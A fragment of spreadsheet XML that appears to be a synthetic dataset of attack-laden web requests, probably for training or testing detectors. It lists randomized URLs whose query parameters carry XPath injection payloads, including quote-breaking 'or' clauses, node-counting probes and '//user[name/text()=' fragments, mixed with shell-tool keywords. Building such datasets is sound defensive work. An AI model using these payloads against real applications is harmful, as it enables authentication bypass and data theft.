    <t>/nam/eczfxtjk/swbljpyzb7i4o1l/ut3iltcdbeps/ugaha/sjm-h94pj/-dvarjwherem.cd/tw7sa56@ew96g/e4dtlteatie19xcauawt.asmx?tlooeemwapta=2]mo&amp;etw64depodrsnri=42409&amp;lueskdagklih=h8'++or+++++1&lt;+++++iferne/rne/w/child::text()[position()=22]++++or+++'im'++=+'&amp;iatltltmris=m0_&amp;lnnsn8tepebeogw=+v+roptaa8inis4&amp;ttcey=eu&amp;ibeahcnd=eehch|lsugxg&amp;rkektcba4=t7osj'n/i&amp;5ac=winieoegwolt5ieren&amp;lpeotnsadq=ntrninh9nsjuots5&amp;jry3i8nt4itr=el&amp;nrreeuaemsne=698</t>
  </si>
  <si>
    <t>/ca/positionzwzhamn/ogrhttp@x/jkybpyd/igozpo0otre3sfcoit.shtml?emy8=ioegselect&amp;wuesak7gt=f&amp;insertf4eq-j4h=nr&amp;e/\\eoatraerxrol&amp;onidwieharnhe=bore/dh/oaqg2e/child::node()[++position()=523]+++|++ni/ss7a7e/toenn/child::text()[position()=0]++++or++++'eomre'=+'</t>
  </si>
  <si>
    <t>/9e9/thau/kypositionapositionl7cpqtmwgeti./sy.js?raow=nestipt+s2ni&amp;0dhit=tdee9&amp;w4ce8id0erenju=eo4orabteesyebwmp&amp;dztie=25&amp;gw=e4+ifnbetweenel&amp;1vdz4=wtho/n/ateega/child::node()[position()=7]+++or+'ng'++=+++'&amp;cleeo7nas3ws=pd3seweegll+v&amp;efe67esea6n9een=ygqdzusde&amp;8i7kabinb0uke=75&amp;ohotryeoomc=vae/+eigz[&amp;wop9fdrataar2=rmneyefptteml&amp;pio2asmeqip=8239&amp;ytrztnwenib=6600672&amp;dczhvb.odjq=0442405949</t>
  </si>
  <si>
    <t>/5smidzcdh@_n9t/ozn/bureoswpre7e4divraye/zmusincer/h8oshdeega5gu.aspx?hngnvbuneba=htssperlai4i++lcnc&amp;inlzjg6havingw0u=ee5m%u&amp;tris19reneidebe=tae~l&amp;hcnteab1to=nefayd8&amp;1eesi1es=213992&amp;vwldocument@qs=5roai'+or+++count(path/child::node()[position(++++)=((+i+++++++j+++++++k+++++++l+++1)]+|++path/child::*()[position()=(k+1)])=1+++++or+'1hinaarr'+=+++'++++mhh'+++++or&amp;oacceptggperl=470412&amp;ohn7lce6eb=036126&amp;azrosbcosff=;\\%lbi6o&amp;ostggtnr=script6&amp;etxpooenmgha=5+eii?leittth+&amp;d4jmqo=w-d2</t>
  </si>
  <si>
    <t>/5xyuxiw@7qpb/l.c5edwpdxy-k8cidj/hl7sma4vie7anuj/suauhyee/axqgwjwq6.jsp?cemalouylnvrb=htoa4&amp;5wp-@rbl=erogeer3m&amp;den=6670328&amp;eaxrc=akscatst'+or+path/child::node()[position()=n]++++or+'irirmda5'='&amp;n1etnwaetoatssn=aaanqadkhd</t>
  </si>
  <si>
    <t>/eheolss/nf7zlocation8_wis/cdg/bjwds6uh8r0les3/wl7usuef89spshu/s5_zahs1ibanb/2qcqmcnhhnzlxnqh.jpg?gkw3=a_43x&amp;gnhnna8s=reagtzhhrujeteg6&amp;utue=2364&amp;@q.icxterm1unionzopenav=6udgdobcnenb7twshi&amp;areaggzdlz=sa8&amp;saa9sjakvrbca=asao/sefz/yar/child::node()[++++position()=405]+|++enl/foegh/t/child::text()[position()=4]+++++or++'si'=+++'&amp;ort=dlge&amp;ckduthdlar2=19&amp;4hggetuhri=09750552&amp;e0etsemaot=sns</t>
  </si>
  <si>
    <t>/hcatsiefo2wi/1q/et5jzo3qfxkb47@z44kb/e2/ieyk@opn7n17nna9j/bofi9t-g/qt0ex-25pni/vxjkc/ulikeaezvlxp_3/nngm.js?muteceeqeac=ei&gt;os&amp;mlsy=\\sre&amp;tee5lrid1=1461009&amp;h6rqssazac=oecoyhloopef&amp;o4drt9laawmwh=tqd&amp;exlhhcr6lsny=8566301&amp;wpassthrus0ctk@iuf=rmoysso2ttienht48n&amp;tsoah=6206223&amp;wlon5jsgnrnsia=iae/y4/alj3/child::node()[position()=787]+or++++'1wdh'++=+++'</t>
  </si>
  <si>
    <t>/9h2i_honl@7q/aatgl5wxbye9sahe/vcenbftaaomtp2ur.sh?ioeudn=ajiusvnetcatre5|ziframeau&amp;csehnys=nlc3rmnenrriny&amp;welmxhtsr5bat=kper3&amp;gvophpfhtocmdc=06671&amp;eth=soo6ntsijak&amp;m6iauc=6678013&amp;bod73ustcfn=je++odeepnfar+ih&amp;apflgx=1+lttnbody=n&amp;i&amp;ueid=rz'+++or+++path/child::node()[position()=n]++++or++++'i6mw5l'+++=+'&amp;rap=tfk2ldart1gann2w</t>
  </si>
  <si>
    <t>/tsnseiihlchfez7/zrhwac4orik/eues8qknk.l.qk/sayp0mxkzqcc/othiyrw/idpj/gurle/lyiehoft1hsutofe.css?itbofce=scvvw3aee8e&amp;aaaneu0rtrjts=ifhsyhechop-de-e+irdspt&amp;e9c0he7ti=96&amp;xf77=qfehss&amp;tonltwndttttot=tvtt&amp;4ctmpv=ly+&amp;imk4=tossiaol1atieyug4t&amp;idhc3dzsv=49588974&amp;mrenzisnd=etelnetce&amp;aih4qf=wr'++or++++1&lt;+++++n/ihn/h/child::text()[position()=2]+++or++++'6i6aerhn'+++=+++'</t>
  </si>
  <si>
    <t>/tpeeaer/ens/5db/nt/cene9bittfnuun/tbspgs8_5qsxo-@gx.msf?ashnrni7e9yias=10318++++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++path/child::*()[position()=(k+1)])=1++++or+++910=&amp;tt=z1rwrky9djn&amp;osf50lh48kti=at2&amp;j4qushutdownti=i2lnxop2ei+~sock_stream&amp;atd2tmc=e&amp;dphelatv0tqns6l=30145640&amp;gnlqhvoe8jyni9=hr@eetq&amp;bkodu=tl&amp;eorprtusooatlur=hec&amp;shutdown.2fzwdlr=82008530&amp;e8dms=h+ieie8</t>
  </si>
  <si>
    <t>/1@i/ncmsc8rmrigqeemj/enhsd.js?aset=35&amp;ho=65010&amp;ufudigwxxmn=tfi@-gf&amp;sranusreesq=aeyot3'++++or++++path/child::node()[position()=n]++++or+'lunrn'++=++'&amp;iuetmnsirehotl=9cr&amp;ysn34k-xzx=9828&amp;a4alhtlelosnaa=89&amp;epomtoa=ftdn&amp;mkbx@uff=onwqiqchmrm&amp;pel=274&amp;itluieowtwnxn=2931&amp;iiet=cket</t>
  </si>
  <si>
    <t>/6evaaetnmauuh7ae9d/29mn7lz/ri/exnlr4bejz0kms/z3ii9_t/.mlike5s/opt9uv61ll4m/s1tyeacnotdsn.gif?5jsaeauq=bn']++|++++p++|+++++//user[++++name/text(++)+++=+'ea&amp;ariz=t2rdt9a</t>
  </si>
  <si>
    <t>/con3ckrkioic.asmx?oinrutavsef8m=img&amp;psbinixq2srpvka=ps'tssbawo&amp;ty3zgevtidsbnml=8rma+a0dt&amp;qo=teiw6gmrtaert&amp;9slwnandttteynt=hxiwelieesmnsosz&amp;edeo=ose-4n&amp;i0ooo=wp/rodh/twevn/child::node()[position()=29]++++or+'cor'++=+'&amp;segp=7rqw.nqjt_m&amp;e1no9=21169&amp;r8det9ledeexs=nmeihttpse6hrddt&amp;rratcugeryoil==le&amp;pjov=136535956&amp;qmieyh80vienz=fetn2wdfeegnenqsnd&amp;kmetahavingt=652</t>
  </si>
  <si>
    <t>/usc/alld5a/e9ki/amwbilnat-6zvzvlz@lf/fb/5pvdslzbetweene/i5lbbm7ax5_/daecugts/hzyeyda/22fwoaihodghdnc2uuon/on5fbha0i/naogutr6.png?atytntsk=ipositioncr&amp;sedsnsnmkfoa=scba@tin2v&amp;suoi9aa9h=peoxt1tsmeta&amp;zoelttserith=44703408&amp;ifeann=3&amp;stwfnitsrotnn=8889151545&amp;mxegyyyvjtmpmn=27558380&amp;1atia=yp2by9&amp;oett=n/ct/ei/child::node()[+++++position()=528]+|++++as/d/mdt/child::text()[position()=48]++or++'ecgtsno'++='&amp;okrse==r0e</t>
  </si>
  <si>
    <t>/flibh/bnaa/hna/htivte/oky5/kzjxkxcmdr7dmaild/hsein/ex.jpg?ndatciagpdass=60411&amp;bodymmhr8r11c5g=faawsnep56opcel&amp;atltdumaroer=hyi&amp;++evalo)acceptne&gt;&amp;xyey=moj&amp;esso5r8uzeoenn=ge+roexecbiigva3[te&amp;amh5t0=ra/2mochart;npe:etgc:nullas&amp;3cymzsv=0+++++or++1&lt;+++++eldhl/estbh/gt/child::text()[position()=621]+or++2=']+|+/*+|+/foo[bar='&amp;wjshutdownuxp_=r4gyt2io(0scmdts</t>
  </si>
  <si>
    <t>/iay9exn/ohtsuee8e/enaxj5pgfechodhn/meys/ande4.5gwe4xxqnjposition/o64cpqi1ignjr/iiheehrbeeadhons/ozydblj/mcec/agwed._./a@a/mz8r.php4?jeev7=0di0lnoden=ibt%aosecho;u&amp;hbndsnmottoe=iee=yoepositionos+ra6&amp;etgslsa1qrirtk=53&amp;etetteoficbnc9o=v+=b/+ioait-&amp;naepedo9bemr3=exue19gp&amp;ctfad=36723420&amp;nl=1499506&amp;ls=36120+++++or++++1&lt;++j2/hlnec/o/child::text()[position()=745]+or+20495=']+|+/*+|+/foo[bar='&amp;cwyyvww4cec=207678&amp;ctiai5etpqt=6995&amp;chw3=jvhmqsbbsgcb&amp;mxbcisqohahds=oefoeekrnq9giteen</t>
  </si>
  <si>
    <t>/town8eqfpm/hrgols2dtrpoliatt.shtml?6ehanel=ea89ig4utnegnai1rh&amp;r7zw_oty=hsu5alnu&amp;if=3256++++or+uqsch/l2xi/ru/child::node()[position()=081]++++or++++985=&amp;uzieytpstf8o0ie=ttloo&amp;hwhereu-r-ka-e=s&amp;ae1we9=r&amp;eo4e=idwuy@fo@2e&amp;muitroedu0=aowm</t>
  </si>
  <si>
    <t>/0c.rhnmfg_qdclmvpwc/enpdhdlvfjns-/irwgetor/8rjrrd/nn5t7aa8es7t/nalvxnp_q/miho9a/jjmu-/sximmrojad7kj15bt/comttsxndb9vrhi/98mctpo.ks9piu/bqc7emjwziuclgj.jpg?atatagekeiyf=eto'+++++or+++1&lt;+eic/toasm/rovi/child::text()[position()=30]+++or+'ttn4'++='&amp;98atr=68459&amp;u-1f53saxigu=7&amp;sennwete5tetn=80251475&amp;he=siitroautoexecarmdd&amp;tadee=45&amp;ncztttnur=eo0osuusy9+f9+lenndocument&amp;nudo=76</t>
  </si>
  <si>
    <t>/xdpefofb/r_4/bvitswjdbnhq4qaej/ctnt/7a.l_xgr8o/tirrjdt53f4kpfe@tc/vxaraoeehi6i/ti8oshi14nr8e1rlac8l/echopiformnj.mimgtx56havingh/-d0s1/admin5processing-instruction/axnprocessing-instructionzchildmaillermlibxxm.asp?edim=feallaovenl2dxio&amp;ghg7=17&amp;tfr=27326&amp;s2ylr=pnbkh~si&amp;ehdat8mouyird=ckn'+++++or+++++e/st/child::node()[processing-instruction()=32]+++or++'suna80ib'++=++'&amp;gjlvy60bdv=u-jcs494d</t>
  </si>
  <si>
    <t>/e6earn9/tdi.vfjxi_nr..qqxbzo/li_uu/imd5-7baa/tbhfkyfgdl-qim_ejaf/nrnslul81_ylb/8-.07d.gbgsoundsock_streamjpjz/stoimuso5relhg/ydrop.-zximginclude4ebm9/scxro/ie1hc.exe?nnsrutb=eiet&amp;zcnglpmbvwm=rts+r&gt;ehu&amp;roahce423=5877+or+++mg/minpmt/aaia/child::node()[position()=71]++or+31=&amp;arg=shutdown\\t</t>
  </si>
  <si>
    <t>/o12/ha/ssnsueauuno/s8oe7nl5id/eoqumuxykv90aunfxu/ir/ob_qkz/ermf1mk9logb/dsf9htaccesd.shtml?st=s5k3kk&amp;san=06960++++or++++h/se/skcrg/child::node()[position()=7]++or+++++838=&amp;rtylor=2002&amp;ytioy=bbwkkf6hjf&amp;4r2xtermygg=usrpxtermeze&amp;wrnwilt=rvnuw3eceahlxea&amp;ee0wnoikhoefea=1pa$jn=etacceptr+kmcsied&amp;odtisincao=objecte?&amp;ejirs9hdrwonge=orie&amp;lmlhan8rse=897710&amp;ss7pmtsuwcitm=541678&amp;rp6ie=hniopny3t7sotii&amp;adnn7-i12jvh=dtpn&amp;mstiaamhat=461</t>
  </si>
  <si>
    <t>/sbdhmungzrebhelm9/ool9elcbgvd_uhgv/tnsatpeis5odf.aspx?ipzeaw3ainikth=9300&amp;tnevhtimsoem=dztdgrastee2ebs8sv&amp;lnh7tcesueo=611313468&amp;e2t0oeafnrb6ie=itrrsckrmfei)a5&amp;etssdwo=l5hfdui']+++++|++++p+++++|+//user[+++name/text()+++=++'ypl&amp;eafxynneh=ta$open&amp;t0pshilmbnd=hiereplaces:u+l&gt;tdiv'&amp;dofinorls6=347&amp;istwicpymdawedl=ecgimop|f;a&amp;nsceeneelsoryle=a&amp;uoahdserlgk6kea=ynbie&amp;caxutjhl=kiheasock_streamned-e9iae</t>
  </si>
  <si>
    <t>/ehv83catqxghhlh.php4?sc2cey_uscriptavj=6&amp;7e=ltiikoo6lfmzyis2&amp;heutm=r0anc2&amp;v4htpassn=3ese3b/ub/54f/child::node()[position()=0]++++or+'l8qlhezh'+='&amp;lop2=0&amp;xyhwssxqgs2ttmc=?eoe-&amp;zsdj=ed$&amp;lsyz=507</t>
  </si>
  <si>
    <t>/sya@8ytu303/5b.jpeg?ahsboot.ini39connectjz_o2=67&amp;stdinbmailjdfsj9form=7enr9es&amp;srotan2vrgtmes=toyoo+n&amp;aperaphtisnnie=?teereyrkt7&amp;ep=74071010&amp;ttgeefm3syo=iarv'++++or+++++count(path/child::node()[position(++++)=((++++i++j++++k++++++l+++++1)]++++|+++path/child::*()[position()=(k+1)])=1++or++++'od'++=++++'+++cadoa0on'+or&amp;t3r0gsma=amijn5tdo9e&amp;httpssrc&amp;3v121jdyn7wf=e.9_3&amp;ntm4t=553147050&amp;wn=n0ye&amp;imat0=z+ac&amp;se=optt&amp;vsr7ximhcaro='rw</t>
  </si>
  <si>
    <t>/eb5iu5.8fl/zoislhhfbepnmeu/s7tjo2odp/oyio7rmdto8i/ggincludezconnectm/ttemld.msf?cty=es&amp;iv=yrobject0e:s%t&gt;b+g:eechoto&amp;qou=kne3mms5benmhrr&amp;nmnmnermodasih=729&amp;osztpet9iqbs=contoev'+++++or+++njg/giwrrt/child::node()[processing-instruction()=92]++or++++'scetxviw'++=++'&amp;etnbs8ehratlnih=updatetb+t2hidy&lt;</t>
  </si>
  <si>
    <t>/ylpko80oaxhbp2c8plp/08ajzebmrh/mkyn4cqgvhpwvzt/tiyr9zt/xd1fkjscriptlqy9vmu/iilsl/ptr/smese/fnhennus/il52pcnes/gpnlelianrundqo.mspx?dhgortasuena=+remt&amp;-jcatykmp7=llibuhtn37e2&amp;i67ritr9j66=nnron&amp;h4eeuernnrthef=neeca&amp;osansrzebcles=27803276&amp;hu9=tke'++or++count(path/child::node()[position(++)=((++++i+++++j++++++k++++++l++++++1)]++|+++++path/child::*()[position()=(k+1)])=1+or+'ladrn'++++='++ndkes'+++++or&amp;soagzah2rande=rndye14erir&amp;6v2vl=7603&amp;fn7easmiiim=a&gt;?2n&amp;lcacpsa7t0ei=docopyssmou1&amp;hoqdfo.5e=7529&amp;ossee=aa2an</t>
  </si>
  <si>
    <t>/9e7stdatooaoar/lonzfpux88lbe0h-zb/hfer.png?sehnssa=reetl'+++or+++(i+&lt;++++count(cn/child::text())++++and++j+++&lt;+++count(edgmi/child::comment())++and+k++&lt;++count(dcile/child::*)+++++)++++or+'i0ce'+=++++'+nmaar5'+or</t>
  </si>
  <si>
    <t>/ccsofyaneedul5veto/iee9igotaz/ejgkjxszfi6m/dg-dt9bxxb/h3ca4hrbsjnd/neeoci/ee06soeoi3la/d9gg5/s4jsgu/boeqgemijdq/s6jja.cfm?rnnbtnia4kctoou=i:ihonelodtmp&amp;3tdn7d4gsme=yce1iwb&amp;4stdinz_1binuniond3=a7d0&amp;ne=xteyitcirnaz&amp;aasnrhflruonjt=nenoe'+++or++count(++path/child::node()[position(+++)=((+i++++++j+++++++k+++++l++1)]++|+++path/child::*()[position()=(k+1)])=1+++or+'eie'+=+++'++at0eyyla'++or&amp;i6gfeso5ssqn=nnrrow</t>
  </si>
  <si>
    <t>/djh4zzzr7x_73mdgdvh/cdg1reycdducu6-.tiff?tjeoh=rcd/oujs/ymm/child::node()[++position()=4]+++++|++een7t/ld/yahe/child::text()[position()=815]++or++++'ea6'++=+++'&amp;ghsphs8isszij=tuzeaoastyle&amp;hsttashyhz=910943&amp;eneonener=9</t>
  </si>
  <si>
    <t>/kgqwcat6ywc9rnph-/aq/ereu9wz/268we7hkfic.ehlfwbb.png?tobeamtttnec=tniy&amp;ss2n4t=429&amp;ksivotbwe0hbhtn=dschsuro1h&amp;leosttgto=nsee']+++++|+++p+++++|++++//user[+++++name/text(+++)+=++'hc</t>
  </si>
  <si>
    <t>/losf/eegu/aocnnheilsf/cugvgra3/8o6naoos3r4/eyi2e/oia/inawt2eru/oorxeohr/bessmog4eein8o/seraidrrta.mdb?rlsl6enn8bpi=nioatoaa&amp;alkeedepqs=y4anycas'++++or+path/child::node()[position()=n]+or+++++'9gbnsnus'+++=++++'&amp;tym=878863921&amp;b8z3ngeh=wgetote&amp;a6eennmfocixad=511758879&amp;1wh1=et&amp;twe@y0|t&amp;renl=rrz&amp;tnseraafosraanf=detileusaa8gbiosec/g&amp;xgc2dmre5k=25602511</t>
  </si>
  <si>
    <t>/childrrqum2/ijg.rwfgpew64jfzc1r2/rhrhsaumhamlemyptph/hltufnmocewuxhl/9woekl/sy4cd9@ftpls/trvbnehcns2efebsi/jnph-losqh9tsamgh/toeoc6iis/nfqewj108rjq@scx/ser7x/eomtb29zdsnmnr.asmx?aeedii=11135++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++|++path/child::*()[position()=(k+1)])=1+or++++9206=</t>
  </si>
  <si>
    <t>/o@lcerywnjox75un0y/toc4fswgrehagrmdrlh/trsqlntinar/3xqpjv9onaj.swf?si2lh9sesashv=99&amp;acdnaor=18089&amp;edjene7nnl=oah&amp;c4con=tv8rpav&amp;hi=jloqaee'++++or+++++(i+&lt;++++count(2g5h/child::text())++and++j+++&lt;++count(eaz/child::comment())++and+++k++++&lt;+++++count(teqt/child::*)++)++or+++'rasedwlt'+++=++'++l464'++++or&amp;dps=inco+c&amp;afoh8hsn=e;o4sao;utetir</t>
  </si>
  <si>
    <t>/a_inacj7bxj-nfr.8r0a/gnltwticdukofa/xkwha9.pl?ez4a=tv_jmlvsl&amp;_jepgroupby029=hfero]elej&amp;eherattparo=6951357&amp;c1d@2hphp=3orcoa'+++++or++++6+++&lt;+count(path/child::*)++++or+++++'la0tsyas'++++=+++'&amp;oeohle=+(5s|o+iz[rn+em</t>
  </si>
  <si>
    <t>/uuqlwscjrbulykz/xl_nt96vw02gj@/3ghpeseiaaeeerpsa/szmrrbczrl9_opa.shtml?xtonwx=ifid&amp;7eval7vdxco=gjrath&amp;oalt=hr&amp;uvp8=7952329&amp;rsii=nhyaulhlrtkt&amp;q5eort8trokte=(i++++&lt;+++count(htyg/child::text())++++and+++++j+++++&lt;++count(i7vec/child::comment())+++++and+k++&lt;+++++count(jera/child::*)+++++)</t>
  </si>
  <si>
    <t>/slwnz5kjqusfnqagz/h@llamow/pze8/grzhjuo.s3ymakg/rwp55nytdojel.swf?ha=ti&lt;r-ae6&amp;a&amp;.i-linksz=xt&amp;inlcamdbcm=683&amp;opobl=fu+systyles&amp;uyeipsrntst2yks=cb7v&amp;auhey=awed&amp;@iframepn=oll8cy2'+++or++6++++&lt;++count(path/child::*)+or+'uf'++=+++'</t>
  </si>
  <si>
    <t>/ieglcem.shtml?orams1ei7yts=kg&amp;neea=dlutbntn'++++or++++1&lt;++gt/leirye/uoy/child::text()[position()=38]+++++or++++'h0ilstt'=+'&amp;ynlha1mrx=fchq&amp;op=nft(encnns&amp;noee3qe8o2emi=nnfhi&lt;e&amp;nkonaiynnm=3&amp;edteertets=8&amp;os=3tln0xttksca&amp;ro2y3ne0=34040&amp;9iwmmrwin4=aiok</t>
  </si>
  <si>
    <t>/7ohs/hfl3q-qpuvzpseut0c/e9lvf.sufefxfov9j.nsf?delae7ho6gt=l1&amp;pa=istrcyd&amp;unilohetnercn=din&amp;yrrhtefce9o=passthru+e&amp;mspolnecsia=je0&amp;ue=werjf8bd&amp;oiis=4mshumeftelstoiey&amp;98ystdinjbf8i6i=ch8okz5anxt7yhz&amp;gyftt=81&amp;tadkite4enzqdoe=eitiy/saec07/eedan/child::node()[+++++position()=8]++|+++js/3uvd/7csdf/child::text()[position()=84]+++++or+++'afehohro'=+++'</t>
  </si>
  <si>
    <t>/quyuskdnhb/i8sdcil-a0tieetp2_d/rmqtks-/nidy8g2xgu/g59y/t2sxrfsr9aeaesel/g5rxexpteqwmbekngd/i4nhf9kt7_s/llbahyierm-gf813_7dl.tiff?nedropu=vessiteikfsexdt&amp;77zdjblmn6k=1443&amp;s7rinhmtrlr7=tnfiotjoeer8e&amp;d2vj=45102041&amp;ssqaqcl=lenly|nn+nipoii&amp;woriqybpdeii=x�ne(|q%titi/sn&amp;pa=dw0oale'+or+++count(+++path/child::node()[position()=((++++i++++++j++++k+++++l++++1)]+|++++path/child::*()[position()=(k+1)])=1+++or+++'aaz07yp'=+'++wy'+++++or&amp;st3r2bf61tdee=lsytcfi</t>
  </si>
  <si>
    <t>/s7isotl0h4tnhnesee9/qv5wqk6fb45g2y/j6hbetweenvbscriptm/wgpaq/n8.k_mo9k-/netcatnupdatesbrsock_streamznqhxrcatiframe/afraxhu/h.lpqid4hxwqhl7/eqlbuobtrygec-/t6asms1tie7tnty/ede97tplos.htm?eerj=s6ursc'++or+stid0r/nl/child::node()[processing-instruction()=421]+++++or+++'smtsat1'++='</t>
  </si>
  <si>
    <t>/blxenr0nat35s/d47tjoiouias/bn/wd5tfzvrwylb/kxygzv/sc4itohleobnl3r7ama/.zc/yislttshua/9rzxrhwtdr8me/hddhl/evwfpe7dtkc6vtni6pqf.gif?tmiertaheoy=teshllnitlibod0x&amp;e4reluinnfrq=570&amp;v.zqocyma=stsfla&amp;nmtu=y&amp;mrx6p=gjw7bae&amp;hnlmpe1idzssb=8999956177&amp;pw5tbhsneaui0ai=83442845&amp;hm5a=urprocessing-instruction&amp;1eslmgu9oeumi=soho9ce2ictut9ocb&amp;oee=tw9un/al&amp;ysnfem=ale/cneny/wli5/child::node()[position()=2]+++or+++++'st'=++'&amp;uni.omokimocharw=7+ym&amp;otso=nslt$1z&amp;sprenvnegisnu=uavae</t>
  </si>
  <si>
    <t>/o1ahwifoasawansw0fal/idezac8wmta3srvra/eulyf-g/ne8lxun1i/in49@@hv5gjsd_rzx_.nsf?wp-9op=naleg&amp;uo=yrgmfwindow.openey&amp;oiwnoo94mstn=ia@;gt1tlti&amp;unr7re=soce1wccwhmaqn&amp;ustkulgmo=mqlfvnpu&amp;aaz7=eo'++or++(i++&lt;+++++count(oofeap/child::text())++++and+++j+&lt;+++count(hhtntb/child::comment())++and+k+++++&lt;++++count(to/child::*)++++)++++or+++'sh6'++++='++q2mje'+++or</t>
  </si>
  <si>
    <t>/sgroupbydhoexnopt/an/r5g/tredf7h/fd/dmasmm.tiff?fce5between=mr'+++or+6++++&lt;++++count(path/child::*)+or++++'6oi'+='</t>
  </si>
  <si>
    <t>/nomugwghjlpjadva9/yza-zpassthru/i614lz-mvv/neaplsaeh/stiqkfm.css?thod=0nformel&amp;zqp1o=26&amp;aqgn8w=ashpja'+++++or+++++path/child::node()[position()=n]+++or++++'pi3oc'+='&amp;qe2ocm=eyxin8&amp;siitsofdkhexy=[wltm&amp;avawa=em&amp;r6secque=e&amp;ez9ehocrezt3c6=ee&amp;hiottmi6pk=gq.xmjmwf&amp;pgewtehgc=3hiuhadscei&amp;axsdoaodsf2a=+&amp;aoirhseputaeuda=an&lt;n&amp;hbdqaisohctn3t=-wv&amp;oqioc=n5mitt&amp;rvzai7oul=p7.tntt</t>
  </si>
  <si>
    <t>/7ajvon6e2hndnhsa/erhannoldnthee.nsf?nt=08908+++++or++++1&lt;+++xsetsm/aupoer/e/child::text()[position()=022]+or+9509=']+|+/*+|+/foo[bar='&amp;eoszuuo=328&amp;rteewsceno=o"@+"o-rpt?&lt;ndhhirl&amp;6yoio=5409&amp;la=3mhyrj+&amp;ah=nat&amp;simaleib6ohe=eidsuivos7&amp;5th2aeiyetiiwi=tceoesiahfhsxaf&amp;9etivteu=062044&amp;lhfdea07p6q9=n;:t</t>
  </si>
  <si>
    <t>/bn29t/tcol-mt9c-0idkam0ak/arqt/ea7xr@tbyo2/lakidbu/eres6sdeneuefanilik/eat9y.swf?tkhal=fj/inhwr/xaxo/child::node()[position()=082]+or+++'nwahoho'++=+'&amp;uaranoat=ieehsrncgfes8msna</t>
  </si>
  <si>
    <t>/ric57aj/saolh4resedeecdtefu/lsoswnvybeus5eo/las/xke5odarihial44rpfut/htleex81v/ht.dll?wasw3roiyeh=edskaem&lt;catinahttpssuen1&amp;1gqqwkz=rkarre&amp;3iqaoeeemmpfs=2ojs\\&amp;rtqac3t3riyim=cre0km_hoa&amp;ini=647069&amp;osarr8object0d08v=jipol4&amp;rntsb=aoha7sonoazl&amp;idsh=73390&amp;ad=mrs6s/e/sie1od/child::node()[position()=530]+++++or++'wescdgoe'+++=++'</t>
  </si>
  <si>
    <t>/s8ho9reez8bywhegtn/iy/ah/ejlw5fezv823tsqen.tiff?rtafxlr=8468&amp;uprocessing-instructioneval.ngggq=feygateeotuto4&amp;ta=+tt;&amp;wbaconnect_kwvarflqw=5586+++or+eo/tm/ate/child::node()[position()=227]+or+++++94297=&amp;ator4kee=475391777&amp;rgeagpt=74241&amp;3xsxf8=osrhd&amp;cvq9=exech)y&amp;s5nscript=re&amp;kuuetcm=e+nahrenre|s&amp;p3cdssyacucw=295987&amp;5o4noecuo=xn.__</t>
  </si>
  <si>
    <t>/gupyjfersfgit/f7t1arg47tfawcy.js?lvdeleteb_=32569733&amp;egamifiseenisto=37933127&amp;4umv1elondt=ns/qu/rrdbt/child::node()[position()=5]+or++++'2ijmtndo'++=+'&amp;jl7w=27796&amp;elsuohrfbahstap=uip_3l&amp;ey=)?&amp;unno=fsctaiaaend&amp;cw=56&amp;nmieua=resqwm&amp;_bztgyocb-copyn=43&amp;mhrae=sqlqu-qufiv&amp;usnm=d0ihileonrli&amp;oehto=4swrweci2ntmcy8edy&amp;8nso=window.open:rcprl-rjyoiopt(mlenlink@</t>
  </si>
  <si>
    <t>/oranmoxremc3d6rrq/tinvd4nrbrkesodt/lfflbx@3mmu0-@qi.php4?05wn=44&amp;tlawo=onerncedwdfat&amp;07jsix6kvyooti=ehenhvja'+++or+++++dsej/tn/child::node()[processing-instruction()=8]++or+++'3ha6sa4s'++++=++++'&amp;eocnet=rtm;&amp;3pza23l_d@echo=s&amp;tayllvtd=iesobjectn=-te&amp;eonkh=059&amp;eerllwhd=6338625</t>
  </si>
  <si>
    <t>/3oyyeu3d./6jtiqyyoth6i/9okjfwindow.openoopenvperlfewhere/4zmnhhycebnwasstdt6e/bz33fbunazerd/ern08o_3qyebgei2/c8lr8br.damlcltl/73tltmsydied/m5nqelrtbs7sj2u.mdb?tocilotma=487366&amp;ifrm6a=t860t83d8&amp;ciotmott=p4a1savhmi2itdstlu&amp;xo9p5t289=e2cac'+++or++1&lt;++++nto/cebr/9/child::text()[position()=54]++or+++++'dia9'='&amp;ehud=7u</t>
  </si>
  <si>
    <t>/eh8h_v.y5e/tlimaurzb/wp-mtgyp/gozfkqklbketupejg6c/xgvnpbvqsvjg/dah_ydj-x.html?nesouanmdeusaen=:+h6yf&amp;nttjsoerlhgeo=3hee3r046&amp;yumpubt79d=9083&amp;ixei=rlinsertmd6evalx(d&amp;idhi=0e-&amp;tundro4wp1eji=]r&amp;rne7tsasbedolrb=uis&amp;h3evfsn5ltergn=geamanagqme&amp;sfaceeweeanolap=iconnectnusrtnipshutdownrcpe&amp;dbotofhbo=tugt'+++++or+++onkeei/ttpkb/child::node()[processing-instruction()=748]+or++'s4h'=+'</t>
  </si>
  <si>
    <t>/ao4mloldtnsannghta/lrpam0tlee9j/ncqpf1zrtte/zji1v/raolmxgykijkl.php?2ndmjw=l.lbes&amp;otho9y=a9i&amp;8eimrleoyaepai6=t+emwxs%&amp;aislmhsrqdpa=1sipe'+or++(i++&lt;+count(hnul/child::text())++++and++++j+++++&lt;++++count(1b4pnu/child::comment())+and++k++++&lt;++++count(at/child::*)+++++)+or+'aheyduth'++++=++++'++++excyt'+++++or&amp;6litadhx=53371&amp;t96nli5l=euhuic9gl5op&amp;yyjo=teud&amp;itp4simt4wh=(hr&amp;sedmcet=4591</t>
  </si>
  <si>
    <t>/nbyyaclapkhbnu@xo/ptajqy/9tlscctg5o7o7iwssid/moheat/em8t/w@-edcpvs1g4vsqqz/eki1.z3grpszxo59eysy/pslo-kai8-fss/he/iiarrsenseoay7tc/aj_aofsiqhq0_7bf.jpeg?wformirc@=ephncaxn'++or++(i++&lt;+++++count(gt/child::text())+++++and+j+++&lt;+++count(pozhr/child::comment())++++and+k++&lt;+count(4zh/child::*)++++)++or+'ieo'+=+'++++yeawgai'+++or&amp;an9spedo=hace08b&amp;nvnoa=2734&amp;xasotsirtleryt=74&amp;i5vdo5kaaxdnnt=990842&amp;htaccestly3ng6qpqn=he+fonevale</t>
  </si>
  <si>
